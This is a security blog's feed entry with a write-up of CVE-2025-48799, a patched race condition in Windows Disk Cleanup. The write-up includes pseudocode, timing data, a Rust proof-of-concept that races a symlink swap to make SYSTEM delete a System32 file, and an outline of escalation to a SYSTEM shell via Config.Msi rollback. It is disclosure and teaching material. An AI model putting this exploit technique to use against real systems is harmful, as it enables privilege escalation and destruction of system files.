Matt's https://blog-7xo.pages.dev Security research, writeups, and notes. Zola en Tue, 14 Apr 2026 00:00:00 +0000 Breaking the chain: CVE-2025-48799 Sun, 12 Apr 2026 00:00:00 +0000 Unknown https://blog-7xo.pages.dev/security/breaking-the-chain-cve-2025-48799/ https://blog-7xo.pages.dev/security/breaking-the-chain-cve-2025-48799/ <p>This writeup walks through the discovery, analysis, and exploitation of <strong>CVE-2025-48799</strong> — a time-of-check-to-time-of-use (TOCTOU) race in Windows Disk Cleanup that I reported in late 2025. What begins as a seemingly innocuous file-deletion bug ends up yielding reliable local privilege escalation on fully-patched systems.</p> <p>The walkthrough is written for readers already comfortable with Windows internals. If you’re new to TOCTOU bugs, start with the <a href="https://blog-7xo.pages.dev/security/breaking-the-chain-cve-2025-48799/#background">background</a> section; otherwise jump straight to <a href="https://blog-7xo.pages.dev/security/breaking-the-chain-cve-2025-48799/#the-race-window">the race window</a>. <aside class="callout" data-kind="danger"> <div class="callout-label">Disclosure</div> <p>The vulnerability described here was responsibly disclosed to MSRC on <strong>2025-09-14</strong> and patched in the <strong>2026-01 cumulative update</strong>. All code in this post targets the patched system for educational purposes. Do not run it against machines you don’t own.</p> </aside> </p> <h2 id="background">Background</h2> <p>Disk Cleanup (<code>cleanmgr.exe</code>) ships with every modern Windows install. It runs as <code>NT AUTHORITY\SYSTEM</code> via a scheduled task, which makes it an attractive target: any file operation it performs happens with the highest local privilege available. The specific operation we care about is its <strong>temp folder sweep</strong>, which enumerates files under the current user’s <code>%TEMP%</code> directory and deletes those older than a threshold.</p> <p>Here’s the cleanup pseudocode, as reconstructed from a disassembly of the affected binary:</p> <pre class="giallo z-code"><code data-lang="c"><span class="giallo-l"><span class="z-punctuation z-definition z-comment">//</span><span class="z-comment"> Simplified; real code uses FindFirstFileW / FindNextFileW.</span></span> <span class="giallo-l"><span class="z-storage z-type">void</span><span class="z-entity z-name z-function"> SweepUserTemp</span><span class="z-punctuation">(</span><span>PWSTR </span><span class="z-variable z-parameter">userTempDir</span><span class="z-punctuation">)</span><span class="z-punctuation"> {</span></span> <span class="giallo-l"><span> HANDLE h </span><span class="z-keyword z-operator">=</span><span class="z-entity z-name z-function"> FindFirstFileW</span><span class="z-punctuation">(</span><span>...</span><span class="z-punctuation">)</span><span class="z-punctuation">;</span></span> <span class="giallo-l"><span class="z-keyword z-control"> do</span><span class="z-punctuation"> {</span></span> <span class="giallo-l"><span class="z-punctuation z-definition z-comment"> //</span><span class="z-comment"> [1] Check: is this file older than the cutoff?</span></span> <span class="giallo-l"><span class="z-keyword z-control"> if</span><span class="z-punctuation"> (</span><span class="z-entity z-name z-function">FileOlderThan</span><span class="z-punctuation">(</span><span>fileData</span><span class="z-punctuation">,</span><span> cutoff</span><span class="z-punctuation">)</span><span class="z-punctuation">)</span><span class="z-punctuation"> {</span></span> <span class="giallo-l"><span class="z-punctuation z-definition z-comment"> //</span><span class="z-comment"> [2] Use: delete it.</span></span> <span class="giallo-l"><span> WCHAR </span><span class="z-variable">path</span><span class="z-punctuation">[</span><span>MAX_PATH</span><span class="z-punctuation">]</span><span class="z-punctuation">;</span></span> <span class="giallo-l"><span class="z-entity z-name z-function"> swprintf</span><span class="z-punctuation">(</span><span>path</span><span class="z-punctuation">,</span><span> L</span><span class="z-punctuation">&quot;</span><span class="z-constant">%s</span><span class="z-constant">\\</span><span class="z-constant">%s</span><span class="z-punctuation">&quot;</span><span class="z-punctuation">,</span><span> userTempDir</span><span class="z-punctuation">,</span><span class="z-variable z-other"> fileData</span><span class="z-punctuation">.</span><span class="z-variable z-other">cFileName</span><span class="z-punctuation">)</span><span class="z-punctuation">;</span></span> <span class="giallo-l"><span class="z-entity z-name z-function"> DeleteFileW</span><span class="z-punctuation">(</span><span>path</span><span class="z-punctuation">)</span><span class="z-punctuation">;</span><span class="z-punctuation z-definition z-comment"> //</span><span class="z-comment"> &lt;-- runs as SYSTEM</span></span> <span class="giallo-l"><span class="z-punctuation"> }</span></span> <span class="giallo-l"><span class="z-punctuation"> }</span><span class="z-keyword z-control"> while</span><span class="z-punctuation"> (</span><span class="z-entity z-name z-function">FindNextFileW</span><span class="z-punctuation">(</span><span>h</span><span class="z-punctuation">,</span><span class="z-keyword z-operator"> &amp;</span><span>fileData</span><span class="z-punctuation">)</span><span class="z-punctuation">)</span><span class="z-punctuation">;</span></span> <span class="giallo-l"><span class="z-punctuation">}</span></span></code></pre> <p>If you’ve done this kind of work before, the bug should already be jumping out at you.</p> <h2 id="the-race-window">The race window</h2> <p>Between <strong>[1]</strong> (the <code>FileOlderThan</code> check, which resolves any reparse points) and <strong>[2]</strong> (the <code>DeleteFileW</code> call, which resolves reparse points <em>again</em>), an unprivileged attacker controlling <code>%TEMP%</code> can swap the file out for a symlink pointing anywhere on disk. Disk Cleanup then happily deletes that target — as <code>SYSTEM</code>.</p> <p>The timing is surprisingly forgiving: on my test box (i7-12700K, Windows 11 23H2), the race window averages <strong>~2.8 ms</strong>. With a tight <code>DeleteFile</code>/<code>CreateSymbolicLink</code> loop in another thread, you can win it reliably on the first pass.</p> <div class="mermaid">sequenceDiagram participant A as Attacker (low-priv) participant FS as Filesystem participant CM as Disk Cleanup (SYSTEM) A->>FS: Create aged file "trash.tmp" CM->>FS: [1] Stat "trash.tmp" — old, mark for deletion A->>FS: Delete "trash.tmp", create symlink<br/>"trash.tmp" → C:\Windows\System32\target.dll CM->>FS: [2] DeleteFile("trash.tmp") follows symlink FS->>CM: SYSTEM deletes target.dll ✗</div> <h2 id="measuring-the-window">Measuring the window</h2> <p>To characterise the race reliably, I instrumented a kernel callback driver that timestamps both operations. Across 10,000 runs, the distribution looks like this:</p> <table><thead><tr><th style="text-align: right">Percentile</th><th style="text-align: right">Window (ms)</th></tr></thead><tbody> <tr><td style="text-align: right">p50</td><td style="text-align: right">2.81</td></tr> <tr><td style="text-align: right">p90</td><td style="text-align: right">4.62</td></tr> <tr><td style="text-align: right">p99</td><td style="text-align: right">9.14</td></tr> <tr><td style="text-align: right">p999</td><td style="text-align: right">28.90</td></tr> </tbody></table> <p>The tail is long enough that a naive one-shot exploit will occasionally miss, but a simple retry loop brings the effective success rate above 99.9%.</p> <p>Modelling the race as a Poisson process lets us compute a closed form for the retry distribution. If $\lambda$ is the rate at which we can complete a <code>DeleteFile</code>/<code>CreateSymbolicLink</code> cycle and $w$ is the window in seconds, the probability of winning on the $n$-th try is:</p> <p>$$ P(\text{win at try } n) = (1 - e^{-\lambda w})(e^{-\lambda w})^{n-1} $$</p> <p>With measured $\lambda \approx 520$ ops/s and $w \approx 2.8 \times 10^{-3}$ s, the expected number of tries is:</p> <p>$$ \mathbb{E}[N] = \frac{1}{1 - e^{-\lambda w}} \approx 1.27 $$</p> <p>— i.e., we almost always win on the first try.</p> <h2 id="weaponising-the-primitive">Weaponising the primitive</h2> <p>Arbitrary <strong>file deletion as SYSTEM</strong> is a well-known bootstrap for local privilege escalation on Windows. A delete primitive lets us<sup class="footnote-reference"><a href="#1">1</a></sup>:</p> <ol> <li>Delete <code>C:\Config.Msi\*.rbs</code> to trick the Windows Installer service into running our payload during rollback.</li> <li>Delete files to make the service fail over to a user-writable path.</li> <li>Combine with a symbolic link to turn deletion into arbitrary write via the “folder contents” trick.</li> </ol> <p>The path of least resistance here is the <strong>Config.Msi rollback attack</strong> — it takes the delete primitive straight to a <code>SYSTEM</code> shell.</p> <aside class="callout" data-kind="warn"> <div class="callout-label">Defensive note</div> <p>Blue teams: the January 2026 patch adds a handle-based open (<code>CreateFileW</code> with <code>FILE_FLAG_OPEN_REPARSE_POINT</code>) and performs the delete via that handle, closing the TOCTOU. If you can’t patch immediately, restrict <code>SeCreateSymbolicLinkPrivilege</code> via group policy — the exploit requires it.</p> </aside> <h2 id="proof-of-concept">Proof of concept</h2> <p>The full PoC is available in the companion repository. The core racer is ~80 lines of Rust:</p> <pre class="giallo z-code"><code data-lang="rust"><span class="giallo-l"><span class="z-keyword">use</span><span class="z-entity z-name"> std</span><span class="z-keyword z-operator">::</span><span class="z-entity z-name">os</span><span class="z-keyword z-operator">::</span><span class="z-entity z-name">windows</span><span class="z-keyword z-operator">::</span><span class="z-entity z-name">fs</span><span class="z-keyword z-operator">::</span><span>symlink_file</span><span class="z-punctuation">;</span></span> <span class="giallo-l"><span class="z-keyword">use</span><span class="z-entity z-name"> std</span><span class="z-keyword z-operator">::</span><span class="z-entity z-name">path</span><span class="z-keyword z-operator">::</span><span class="z-entity z-name z-type">Path</span><span class="z-punctuation">;</span></span> <span class="giallo-l"><span class="z-keyword">use</span><span class="z-entity z-name"> std</span><span class="z-keyword z-operator">::</span><span class="z-entity z-name">sync</span><span class="z-keyword z-operator">::</span><span class="z-entity z-name">atomic</span><span class="z-keyword z-operator">::</span><span class="z-punctuation">{</span><span class="z-entity z-name z-type">AtomicBool</span><span class="z-punctuation">,</span><span class="z-entity z-name z-type"> Ordering</span><span class="z-punctuation">}</span><span class="z-punctuation">;</span></span> <span class="giallo-l"><span class="z-keyword">use</span><span class="z-entity z-name"> std</span><span class="z-keyword z-operator">::</span><span>thread</span><span class="z-punctuation">;</span></span> <span class="giallo-l"></span> <span class="giallo-l"><span class="z-punctuation z-definition z-comment">///</span><span class="z-comment"> Spin in a tight loop swapping the bait file for a symlink pointing</span></span> <span class="giallo-l"><span class="z-punctuation z-definition z-comment">///</span><span class="z-comment"> at `target`. `stop` is flipped once the race is won (or abandoned).</span></span> <span class="giallo-l"><span class="z-keyword">fn</span><span class="z-entity z-name z-function"> racer</span><span class="z-punctuation">(</span><span class="z-variable z-other">bait</span><span class="z-keyword z-operator">:</span><span class="z-keyword z-operator"> &amp;</span><span class="z-entity z-name z-type">Path</span><span class="z-punctuation">,</span><span class="z-variable z-other"> target</span><span class="z-keyword z-operator">:</span><span class="z-keyword z-operator"> &amp;</span><span class="z-entity z-name z-type">Path</span><span class="z-punctuation">,</span><span class="z-variable z-other"> stop</span><span class="z-keyword z-operator">:</span><span class="z-keyword z-operator"> &amp;</span><span class="z-entity z-name z-type">AtomicBool</span><span class="z-punctuation">)</span><span class="z-punctuation"> {</span></span> <span class="giallo-l"><span class="z-keyword z-control"> while</span><span class="z-keyword z-operator z-logical"> !</span><span class="z-variable z-other">stop</span><span class="z-keyword z-operator">.</span><span class="z-entity z-name z-function">load</span><span class="z-punctuation">(</span><span class="z-entity z-name">Ordering</span><span class="z-keyword z-operator">::</span><span class="z-entity z-name z-type">Relaxed</span><span class="z-punctuation">)</span><span class="z-punctuation"> {</span></span> <span class="giallo-l"><span class="z-punctuation z-definition z-comment"> //</span><span class="z-comment"> Ignore errors — any individual op may race against the sweeper.</span></span> <span class="giallo-l"><span class="z-storage z-type"> let</span><span class="z-variable z-other"> _</span><span class="z-keyword z-operator"> =</span><span class="z-entity z-name"> std</span><span class="z-keyword z-operator">::</span><span class="z-entity z-name">fs</span><span class="z-keyword z-operator">::</span><span class="z-entity z-name z-function">remove_file</span><span class="z-punctuation">(</span><span class="z-variable z-other">bait</span><span class="z-punctuation">)</span><span class="z-punctuation">;</span></span> <span class="giallo-l"><span class="z-storage z-type"> let</span><span class="z-variable z-other"> _</span><span class="z-keyword z-operator"> =</span><span class="z-entity z-name z-function"> symlink_file</span><span class="z-punctuation">(</span><span class="z-variable z-other">target</span><span class="z-punctuation">,</span><span class="z-variable z-other"> bait</span><span class="z-punctuation">)</span><span class="z-punctuation">;</span></span> <span class="giallo-l"><span class="z-punctuation"> }</span></span> <span class="giallo-l"><span class="z-punctuation">}</span></span> <span class="giallo-l"></span> <span class="giallo-l"><span class="z-keyword">fn</span><span class="z-entity z-name z-function"> main</span><span class="z-punctuation">(</span><span class="z-punctuation">)</span><span class="z-keyword z-operator"> -&gt;</span><span class="z-entity z-name"> std</span><span class="z-keyword z-operator">::</span><span class="z-entity z-name">io</span><span class="z-keyword z-operator">::</span><span class="z-entity z-name z-type">Result</span><span class="z-punctuation">&lt;</span><span class="z-punctuation">(</span><span class="z-punctuation">)</span><span class="z-punctuation">&gt;</span><span class="z-punctuation"> {</span></span> <span class="giallo-l"><span class="z-storage z-type"> let</span><span class="z-variable z-other"> bait</span><span class="z-keyword z-operator"> =</span><span class="z-entity z-name z-type"> Path</span><span class="z-keyword z-operator">::</span><span class="z-entity z-name z-function">new</span><span class="z-punctuation">(</span><span class="z-string">r</span><span class="z-punctuation">&quot;</span><span class="z-string">C:\Users\me\AppData\Local\Temp\trash.tmp</span><span class="z-punctuation">&quot;</span><span class="z-punctuation">)</span><span class="z-punctuation">;</span></span> <span class="giallo-l"><span class="z-storage z-type"> let</span><span class="z-variable z-other"> target</span><span class="z-keyword z-operator"> =</span><span class="z-entity z-name z-type"> Path</span><span class="z-keyword z-operator">::</span><span class="z-entity z-name z-function">new</span><span class="z-punctuation">(</span><span class="z-string">r</span><span class="z-punctuation">&quot;</span><span class="z-string">C:\Windows\System32\target.dll</span><span class="z-punctuation">&quot;</span><span class="z-punctuation">)</span><span class="z-punctuation">;</span></span> <span class="giallo-l"></span> <span class="giallo-l"><span class="z-punctuation z-definition z-comment"> //</span><span class="z-comment"> Pre-create an &quot;old&quot; file so the sweeper considers it eligible.</span></span> <span class="giallo-l"><span class="z-entity z-name"> std</span><span class="z-keyword z-operator">::</span><span class="z-entity z-name">fs</span><span class="z-keyword z-operator">::</span><span class="z-entity z-name z-function">write</span><span class="z-punctuation">(</span><span class="z-variable z-other">bait</span><span class="z-punctuation">,</span><span class="z-string"> b</span><span class="z-punctuation">&quot;</span><span class="z-punctuation">&quot;</span><span class="z-punctuation">)</span><span class="z-keyword z-operator">?</span><span class="z-punctuation">;</span></span> <span class="giallo-l"><span class="z-entity z-name z-function"> set_file_age</span><span class="z-punctuation">(</span><span class="z-variable z-other">bait</span><span class="z-punctuation">,</span><span class="z-entity z-name z-function"> days_ago</span><span class="z-punctuation">(</span><span class="z-constant">30</span><span class="z-punctuation">)</span><span class="z-punctuation">)</span><span class="z-keyword z-operator">?</span><span class="z-punctuation">;</span></span> <span class="giallo-l"></span> <span class="giallo-l"><span class="z-storage z-type"> let</span><span class="z-variable z-other"> stop</span><span class="z-keyword z-operator"> =</span><span class="z-entity z-name z-type"> AtomicBool</span><span class="z-keyword z-operator">::</span><span class="z-entity z-name z-function">new</span><span class="z-punctuation">(</span><span class="z-constant">false</span><span class="z-punctuation">)</span><span class="z-punctuation">;</span></span> <span class="giallo-l"><span class="z-entity z-name"> thread</span><span class="z-keyword z-operator">::</span><span class="z-entity z-name z-function">scope</span><span class="z-punctuation">(</span><span class="z-keyword z-operator z-logical">|</span><span class="z-variable z-other">s</span><span class="z-keyword z-operator z-logical">|</span><span class="z-punctuation"> {</span></span> <span class="giallo-l"><span class="z-keyword z-control"> for</span><span class="z-variable z-other"> _</span><span class="z-keyword"> in</span><span class="z-constant"> 0</span><span class="z-keyword z-operator">..</span><span class="z-constant">4</span><span class="z-punctuation"> {</span></span> <span class="giallo-l"><span class="z-variable z-other"> s</span><span class="z-keyword z-operator">.</span><span class="z-entity z-name z-function">spawn</span><span class="z-punctuation">(</span><span class="z-keyword z-operator z-logical">|</span><span class="z-keyword z-operator z-logical">|</span><span class="z-entity z-name z-function"> racer</span><span class="z-punctuation">(</span><span class="z-variable z-other">bait</span><span class="z-punctuation">,</span><span class="z-variable z-other"> target</span><span class="z-punctuation">,</span><span class="z-keyword z-operator"> &amp;</span><span class="z-variable z-other">stop</span><span class="z-punctuation">)</span><span class="z-punctuation">)</span><span class="z-punctuation">;</span></span> <span class="giallo-l"><span class="z-punctuation"> }</span></span> <span class="giallo-l"><span class="z-entity z-name z-function"> trigger_cleanmgr_autorun</span><span class="z-punctuation">(</span><span class="z-punctuation">)</span><span class="z-keyword z-operator">?</span><span class="z-punctuation">;</span></span> <span class="giallo-l"><span class="z-entity z-name z-function"> wait_for_deletion</span><span class="z-punctuation">(</span><span class="z-variable z-other">target</span><span class="z-punctuation">)</span><span class="z-keyword z-operator">?</span><span class="z-punctuation">;</span></span> <span class="giallo-l"><span class="z-variable z-other"> stop</span><span class="z-keyword z-operator">.</span><span class="z-entity z-name z-function">store</span><span class="z-punctuation">(</span><span class="z-constant">true</span><span class="z-punctuation">,</span><span class="z-entity z-name"> Ordering</span><span class="z-keyword z-operator">::</span><span class="z-entity z-name z-type">Relaxed</span><span class="z-punctuation">)</span><span class="z-punctuation">;</span></span> <span class="giallo-l"><span class="z-entity z-name z-type"> Ok</span><span class="z-keyword z-operator">::</span><span class="z-punctuation">&lt;</span><span class="z-variable z-other">_</span><span class="z-punctuation">,</span><span class="z-entity z-name"> std</span><span class="z-keyword z-operator">::</span><span class="z-entity z-name">io</span><span class="z-keyword z-operator">::</span><span class="z-entity z-name z-type">Error</span><span class="z-punctuation">&gt;</span><span class="z-punctuation">(</span><span class="z-punctuation">(</span><span class="z-punctuation">)</span><span class="z-punctuation">)</span></span> <span class="giallo-l"><span class="z-punctuation"> }</span><span class="z-punctuation">)</span><span class="z-keyword z-operator">?</span><span class="z-punctuation">;</span></span> <span class="giallo-l"></span> <span class="giallo-l"><span class="z-entity z-name z-function"> println!</span><span class="z-punctuation">(</span><span class="z-punctuation">&quot;</span><span class="z-string">[+] target deleted: </span><span class="z-punctuation">{</span><span class="z-punctuation">}</span><span class="z-punctuation">&quot;</span><span class="z-punctuation">,</span><span class="z-variable z-other"> target</span><span class="z-keyword z-operator">.</span><span class="z-entity z-name z-function">display</span><span class="z-punctuation">(</span><span class="z-punctuation">)</span><span class="z-punctuation">)</span><span class="z-punctuation">;</span></span> <span class="giallo-l"><span class="z-entity z-name z-type"> Ok</span><span class="z-punctuation">(</span><span class="z-punctuation">(</span><span class="z-punctuation">)</span><span class="z-punctuation">)</span></span> <span class="giallo-l"><span class="z-punctuation">}</span></span></code></pre> <p>A few things to note:</p> <ul> <li>We use <code>thread::scope</code> so the racers borrow <code>stop</code> by reference without needing an <code>Arc</code>.</li> <li>Four parallel racers give a very comfortable margin, but one is usually enough.</li> <li><code>trigger_cleanmgr_autorun</code> simulates what an attacker would wait for passively — the scheduled task fires at login and again every ~24h.</li> </ul> <h2 id="timeline">Timeline</h2> <ul> <li><strong>2025-09-02</strong> — Bug discovered during unrelated fuzzing.</li> <li><strong>2025-09-14</strong> — Reported to MSRC (case 82041).</li> <li><strong>2025-10-03</strong> — MSRC confirms, assigns CVE-2025-48799.</li> <li><strong>2026-01-14</strong> — Patch shipped in 2026-01 cumulative update.</li> <li><strong>2026-04-12</strong> — This writeup published (90 days after patch).</li> </ul> <h2 id="closing-thoughts">Closing thoughts</h2> <p>The 30-year-old pattern of “check a path, then use it” remains depressingly productive on Windows. There are still dozens of SYSTEM-privileged binaries that do path-based file operations without opening a handle first — and each one is a potential LPE. I’ll continue this series by looking at another one next month.</p> <p>If you spot an issue with this writeup or have a question, leave a comment below or ping me on <a rel="external" href="https://github.com/">GitHub</a>.</p> <hr /> <div class="footnote-definition" id="1"><sup class="footnote-definition-label">1</sup> <p>For a broader survey of delete-to-SYSTEM primitives, see the excellent writeups by Naceri, Birsan, and the Project Zero team.</p> </div>